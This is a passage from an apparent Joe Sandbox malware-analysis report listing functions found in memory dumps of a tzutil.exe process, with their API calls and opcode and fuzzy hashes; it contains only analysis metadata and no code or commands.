                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFile
                                                              • String ID:
                                                              • API String ID: 4033686569-0
                                                              • Opcode ID: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                              • Instruction ID: 46a1dec817287b0b2a10c33354c51832a2ff24eeaf024d8daab42e7acc2afb8d
                                                              • Opcode Fuzzy Hash: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                              • Instruction Fuzzy Hash: DE117071A013087BD660EB58DD46FABB7ACEF85704F10410DF9486B281DB7579058BA6
                                                              Function 00AC9780 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00AC97B1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction ID: db69a2030042338c681e668d3ed26bbd6e7fa17e4dadac906c03269fc654ecb2
                                                              • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction Fuzzy Hash: B0E08C76201604BBD220FA59DC02F9BBBACEFC6714F018019FA48A7281C671B9148BF1
                                                              Function 033D4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b7efe614ffa0f718faa28e042a5bda6a11ba62bff9a8244dc480473637de6501
                                                              • Instruction ID: a3ecb1115e92992c5fbb536f0788e94df2d341c92a30c67d3e57867b7125bc98
                                                              • Opcode Fuzzy Hash: b7efe614ffa0f718faa28e042a5bda6a11ba62bff9a8244dc480473637de6501
                                                              • Instruction Fuzzy Hash: 2A900235A15814129140B15C48C4546400597E0701B55C011E0424958C8B248A565361
                                                              Function 033D4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9d7111eb3569d1cb3939dc080a2f7369805607a7fd4c9fe09262dafc45d08487
                                                              • Instruction ID: 3e7c1a5601bd35e19e959f03bd01ddc64e3ab1d160a8f082f8b7d48bc0e71d5b
                                                              • Opcode Fuzzy Hash: 9d7111eb3569d1cb3939dc080a2f7369805607a7fd4c9fe09262dafc45d08487
                                                              • Instruction Fuzzy Hash: 32900265A11514424140B15C4844406600597E1701395C115A0554964C872889559269
                                                              Function 033D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 33b62526d4f290143d188cd4d83335b65911120dd01f9b6138f3f9fcf8c7cb57
                                                              • Instruction ID: 0de7b8ff8a2752ee2c2d4e0fdfe7799b964af5a63d82817e2ac0f31a1c9c7673
                                                              • Opcode Fuzzy Hash: 33b62526d4f290143d188cd4d83335b65911120dd01f9b6138f3f9fcf8c7cb57
                                                              • Instruction Fuzzy Hash: 82900265612414034105B15C4454616400A87E0601B55C021E1014994DC63589916125
                                                              Function 033D2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e7a9f51de9bc68e57a91de275eddb1c268a4531fe2205d1f0c5e222f147fe3d2
                                                              • Instruction ID: 996450f4c36f198a68892aa2f462820858eca60e550de8c5b5cb15a05c9be4a9
                                                              • Opcode Fuzzy Hash: e7a9f51de9bc68e57a91de275eddb1c268a4531fe2205d1f0c5e222f147fe3d2
                                                              • Instruction Fuzzy Hash: EF900235A1541C02D150B15C4454746000587D0701F55C011A0024A58D87658B5576A1
                                                              Function 033D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f15826b80319bc3f34543e52223de11c09d9de7041227b697b3fdc3d8b5531e7
                                                              • Instruction ID: 9e24e7786c20dce33e377167312c6103e16ef3885a4b36f0e005eee4c62435fb
                                                              • Opcode Fuzzy Hash: f15826b80319bc3f34543e52223de11c09d9de7041227b697b3fdc3d8b5531e7
                                                              • Instruction Fuzzy Hash: E790023561141C02D180B15C444464A000587D1701F95C015A0025A58DCB258B5977A1
                                                              Function 033D2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 63f80f501c5504e00e7ec52c0c58f76277c639a04facca350fe3075d3dbbf31d
                                                              • Instruction ID: 079dce7905aabf82f86fb371246bf4591f463629e25781046d5c0de8fb2f87a9
                                                              • Opcode Fuzzy Hash: 63f80f501c5504e00e7ec52c0c58f76277c639a04facca350fe3075d3dbbf31d
                                                              • Instruction Fuzzy Hash: F590023561545C42D140B15C4444A46001587D0705F55C011A0064A98D97358E55B661
                                                              Function 033D2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: d218972c9a01d2494aa872a9ace3c76199597ab90e274b18a49f28be23d6fccd
                                                              • Instruction ID: 134197061ce5e6dd287fe7544f18dc4c98dd43a2b92c78167f78f043b41ab53b
                                                              • Opcode Fuzzy Hash: d218972c9a01d2494aa872a9ace3c76199597ab90e274b18a49f28be23d6fccd
                                                              • Instruction Fuzzy Hash: 7C900229631414020145F55C064450B044597D6751395C015F1416994CC73189655321
                                                              Function 033D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f7b60905079b93f88cadfb7e129dfbb45234787221910451c5eb4f9c35619bc3
                                                              • Instruction ID: 416adaa6de3ebe84f64523d3edd7282608df79fc88ac9728ea7c878b4363444c
                                                              • Opcode Fuzzy Hash: f7b60905079b93f88cadfb7e129dfbb45234787221910451c5eb4f9c35619bc3
                                                              • Instruction Fuzzy Hash: 6990043D731414030105F55C07445070047C7D5751355C031F1015D54CD731CD715131
                                                              Function 033D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c16d94c322c2f9cf680cb250c3c8d59fd4870650cd4c2028b3f6637c39423b51
                                                              • Instruction ID: 470ce1a637501aa436eb02ccf19f05d997c93ba32eb0f364087e7501273cdc19
                                                              • Opcode Fuzzy Hash: c16d94c322c2f9cf680cb250c3c8d59fd4870650cd4c2028b3f6637c39423b51
                                                              • Instruction Fuzzy Hash: 0690026575141842D100B15C4454B060005C7E1701F55C015E1064958D8729CD526126
                                                              Function 033D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: cdfa425b2e22135e1a4492c471605b7fd608b0874cd75cd333462f6e70fbfc8d
                                                              • Instruction ID: 9010e33d2b016f2beff0dd6ee16a498ec2cb2983bf618f27a51478bfc0eb28c8
                                                              • Opcode Fuzzy Hash: cdfa425b2e22135e1a4492c471605b7fd608b0874cd75cd333462f6e70fbfc8d
                                                              • Instruction Fuzzy Hash: 55900225A11414424140B16C88849064005ABE1611755C121A0998954D866989655665
                                                              Function 033D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c2d0f30cc807f23b62c6e677511c6e5f2474e6bde74bfc2b8b9d031456e56705
                                                              • Instruction ID: 64fc514bea49eb1e74abae88d8c601352b7146a990cb364735727773d1464f15
                                                              • Opcode Fuzzy Hash: c2d0f30cc807f23b62c6e677511c6e5f2474e6bde74bfc2b8b9d031456e56705
                                                              • Instruction Fuzzy Hash: 5F900225621C1442D200B56C4C54B07000587D0703F55C115A0154958CCA2589615521
                                                              Function 033D2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 439ebff91fc907142cb55aa68a2c031433faf2ae12a92f856614484364424fe0
                                                              • Instruction ID: 0f1661da5468a54e64776752bdbe8d8f5c7599ec59aafa188d53af5a4234b99e
                                                              • Opcode Fuzzy Hash: 439ebff91fc907142cb55aa68a2c031433faf2ae12a92f856614484364424fe0
                                                              • Instruction Fuzzy Hash: DC900225A1141902D101B15C4444616000A87D0641F95C022A1024959ECB358A92A131
                                                              Function 033D2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bcbfb24bfceca95780b61676c15f049e28c59f6ec4324d25191894aa79672197
                                                              • Instruction ID: 654779eb474deca4b3cb438affe2999f700d5d59bab8ed48e697eb7f867f520d
                                                              • Opcode Fuzzy Hash: bcbfb24bfceca95780b61676c15f049e28c59f6ec4324d25191894aa79672197
                                                              • Instruction Fuzzy Hash: 3A90026561181803D140B55C4844607000587D0702F55C011A2064959E8B398D516135
                                                              Function 033D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 50a0ab3e264b842fe3eca6c42094b1154d60e72c0c799b35c4131d1fde11ffd6
                                                              • Instruction ID: d92876e4c81d8d0f1c454c41c7c0636c5ac4ce0c5991735bf022baff4d744e0b
                                                              • Opcode Fuzzy Hash: 50a0ab3e264b842fe3eca6c42094b1154d60e72c0c799b35c4131d1fde11ffd6
                                                              • Instruction Fuzzy Hash: 3590022571141403D140B15C54586064005D7E1701F55D011E0414958CDA2589565222
                                                              Function 033D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: cb1d7dc16cb3bac0e36aed285400b4d1e0547c8803bdc1e9d0ef0a1ac9f908e1
                                                              • Instruction ID: ad3ca3b2cff89b04842a61f94b2aa97558b999ac40ba035710b58cca18b0cf58
                                                              • Opcode Fuzzy Hash: cb1d7dc16cb3bac0e36aed285400b4d1e0547c8803bdc1e9d0ef0a1ac9f908e1
                                                              • Instruction Fuzzy Hash: CF90022D62341402D180B15C544860A000587D1602F95D415A001595CCCA2589695321
                                                              Function 033D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7e2aac521d5903c9a588592897f922dcad5b8c5b2437cd1a201dd76ba6bff5f3
                                                              • Instruction ID: 7d656f49a76f399974318d6d701a500d711be846f8afffc54cf7b47697b4419c
                                                              • Opcode Fuzzy Hash: 7e2aac521d5903c9a588592897f922dcad5b8c5b2437cd1a201dd76ba6bff5f3
                                                              • Instruction Fuzzy Hash: 7190023561141813D111B15C4544707000987D0641F95C412A042495CD97668A52A121
                                                              Function 033D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 69f1209286832523bfb7a49b986a95f4ce306844774cf31bbc4e1d6fddea3701
                                                              • Instruction ID: eca8b2963df046b2e4f32df4f937262cc0c3be316e3dbde01d03e531eba75379
                                                              • Opcode Fuzzy Hash: 69f1209286832523bfb7a49b986a95f4ce306844774cf31bbc4e1d6fddea3701
                                                              • Instruction Fuzzy Hash: 5D900435753455535545F15C44445074007D7F07417D5C013F1414D54CC737DD57D731
                                                              Function 033D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 78809e192aeaca20e0971a23e5b73ab7ab970f703e21e16cde5be34fa1568a01
                                                              • Instruction ID: 1a8551b6a73cc61b9ed4fecdff532739dd8a18a548ff7e60887276eb4d026ea9
                                                              • Opcode Fuzzy Hash: 78809e192aeaca20e0971a23e5b73ab7ab970f703e21e16cde5be34fa1568a01
                                                              • Instruction Fuzzy Hash: 9C90023561149C02D110B15C844474A000587D0701F59C411A4424A5CD87A589917121
                                                              Function 033D2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 97c44bf714f25a10f91a75248c73210485538f8e0329dc2e58a575894b0973c0
                                                              • Instruction ID: 10dee22cfcb52506002966977059d0c2637a0a5a94b14314c503c8436831299f
                                                              • Opcode Fuzzy Hash: 97c44bf714f25a10f91a75248c73210485538f8e0329dc2e58a575894b0973c0
                                                              • Instruction Fuzzy Hash: 4F90023561141C42D100B15C4444B46000587E0701F55C016A0124A58D8725C9517521
                                                              Function 033D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: df504234817e8959559fb7f2e217c3040f1779553d9dd2cfd948e583f4d7044b
                                                              • Instruction ID: 99288c75c7aa282d25843f981c22e5448f314c9acdeaad588df168c1f98b81e9
                                                              • Opcode Fuzzy Hash: df504234817e8959559fb7f2e217c3040f1779553d9dd2cfd948e583f4d7044b
                                                              • Instruction Fuzzy Hash: D090023561141802D100B59C5448646000587E0701F55D011A5024959EC77589916131
                                                              Function 033D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 47082d7f9464ecbc8a1864cfffebfd9839e4600034d1a666f898256450a6d566
                                                              • Instruction ID: a9ec53c6fb064a00d3a5541852afb6a3da10c2081aff6ae784e8a32f75ec9886
                                                              • Opcode Fuzzy Hash: 47082d7f9464ecbc8a1864cfffebfd9839e4600034d1a666f898256450a6d566
                                                              • Instruction Fuzzy Hash: 01900235A1551802D100B15C4554706100587D0601F65C411A042496CD87A58A5165A2
                                                              Function 033D39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
